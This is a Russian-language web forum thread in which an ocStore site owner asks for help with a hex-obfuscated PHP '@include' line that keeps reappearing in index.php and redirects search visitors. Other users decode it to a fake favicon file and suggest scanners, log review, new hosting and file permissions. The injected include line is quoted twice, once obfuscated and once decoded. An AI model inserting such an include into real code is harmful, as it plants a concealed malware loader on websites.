Перейти к содержанию
kate1987

В файл добавляется сторонний код

Рекомендуемые сообщения

Здравствуйте. Использую ocStore-1.5.5.1.2

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

/*16736*/

@include "\x2fva\x72/w\x77w/\x72oy\x61la\x73si\x73ta\x6ets\x2fro\x79al\x2das\x73is\x74an\x74s.\x63om\x2fad\x6din\x2fmo\x64el\x2fsa\x6ce/\x66av\x69co\x6e_0\x3931\x651.\x69co";

/*16736*/

В результате при переходе с поисковой фразы гугл идет редирект на левый сайт. Сайт был проверен и почищен, изменены права на папки и файлы. Единственное вот добавляется этот код который отсутствует в оригинальном файле. Прошу помощи

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

плохо проверили и плохо почистили от вирусов

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
12 минут назад, kate1987 сказал:

Здравствуйте. Использую ocStore-1.5.5.1.2

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

/*16736*/

@include "\x2fva\x72/w\x77w/\x72oy\x61la\x73si\x73ta\x6ets\x2fro\x79al\x2das\x73is\x74an\x74s.\x63om\x2fad\x6din\x2fmo\x64el\x2fsa\x6ce/\x66av\x69co\x6e_0\x3931\x651.\x69co";

/*16736*/

В результате при переходе с поисковой фразы гугл идет редирект на левый сайт. Сайт был проверен и почищен, изменены права на папки и файлы. Единственное вот добавляется этот код который отсутствует в оригинальном файле. Прошу помощи

там посмотрите, куда ссылка ведет
<?   /*16736*/

@include "/var/www/royalassistants/royal-assistants.com/admin/model/sale/favicon_0931e1.ico";

/*16736*/  ?>

А вообще все проверять надо.

Изменено пользователем Kindzaza

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Проверила касперским, удалила все вирусные файлы. Но инклуд  этот все равно добавляется. Данных файлов на которые ссылается инклуд уже нет. Как и файлов типа saaplxah.php с троянами

 

Файлы еще раз были перезалиты и перепроверены. Редирект на левый сайт с гугла ушел.

Изменено пользователем kate1987

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

сталкивался с такой проблемой. соседи по серверу заразные оказались, решилось все сменой хостинга.

 

ЗЫ посмотрите логи сервера

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Поменяла уже хостинг. Но мб не до конца почистила. Пока вирусные файлы не генерируются, но код инклуд добавляется.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Цитата

Проверила касперским, удалила все вирусные файлы.

это плохой выбор в данном случае. Проверьте хотя бы айболитом

https://www.revisium.com/ai/

а вообще, если тот, кто получил доступ, имеет хоть какую-то квалификацию и желание, без проблем сделает себе вполне аккуратную, не вызывающую подозрений дырку, которую вы сканером не найдете. Только вдумчивым анализом логов, изменений  и пр.

Для начал стоит задуматься, как получилось, что для файлов разрешена запись:

Цитата

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

 

Изменено пользователем Shureg
  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Права на файл 644. Так что даже не знаю как код туда добавляется

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
42 минуты назад, kate1987 сказал:

Права на файл 644. Так что даже не знаю как код туда добавляется

Поставьте 444 и тогда это действительно станет интересным вопросом, а 644 позволяют записывать владельцу.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Уже не записывается. Видно что то не дочищено было. Спасибо

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.